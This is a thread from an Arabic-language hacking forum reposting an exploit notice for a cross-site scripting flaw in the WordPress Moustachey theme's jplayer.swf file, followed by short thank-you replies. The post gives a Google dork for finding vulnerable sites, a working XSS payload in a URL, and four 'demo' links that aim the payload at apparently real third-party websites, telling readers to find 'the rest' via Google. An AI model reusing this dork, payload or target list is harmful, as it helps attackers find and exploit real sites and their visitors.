1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Ubuntu | المشاهدات : 810 | الردود : 3
حالة الموضوع:
مغلق
  1. Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته

    WordPress Moustachey (jplayer.swf) Cross Site Scripting vulnerability


    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit Title:  WordPress Moustachey (jplayer.swfCross Site Scripting vulnerability
    ***91;+***93Date3-12-2013
    ***91;+***93CategoryWebApp
    ***91;+***93Google Dorkinurl:"/wp-content/themes/moustachey"
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################

    Proof:

    http//127.0.0.1/***91;Path***93;/wwp-content/themes/moustachey/assets/js/plugins/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day TUNISIAN CYBER/)//

     
    Demos:
    http://zacharyflower.com/wordpress/wp-content/themes/moustachey/assets/js/plugins/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://officinadacamera.com/n/wp-content/themes/moustachey/assets/js/plugins/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://themexpatriate.com/wp-content/themes/moustachey/assets/js/plugins/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://www.abakan.fr/wp-content/themes/moustachey/assets/js/plugins/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//

    the rest google

    ./3nD
    ########################################################################################
     
  2. Tr0J4n ExpErt DeveloPer

    الأنتساب:
    ‏3 سبتمبر 2011
    المشاركات:
    50
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    الصين الشعبيه
    رد: WordPress Moustachey (jplayer.swf) Cross Site Scripting vulnerability

    مشكوور اخووي .. ^:"​
     
  3. ӎƦ.HmidE DeveloPer Plus

    الأنتساب:
    ‏9 يوليو 2012
    المشاركات:
    106
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    الوظيفة:
    .....
    الإقامة:
    JoRdaN
    رد: WordPress Moustachey (jplayer.swf) Cross Site Scripting vulnerability

    بارك الله فيك والله يعطيك الف عافيه ​
     
  4. NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: WordPress Moustachey (jplayer.swf) Cross Site Scripting vulnerability

    شكرا جزيلا .
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة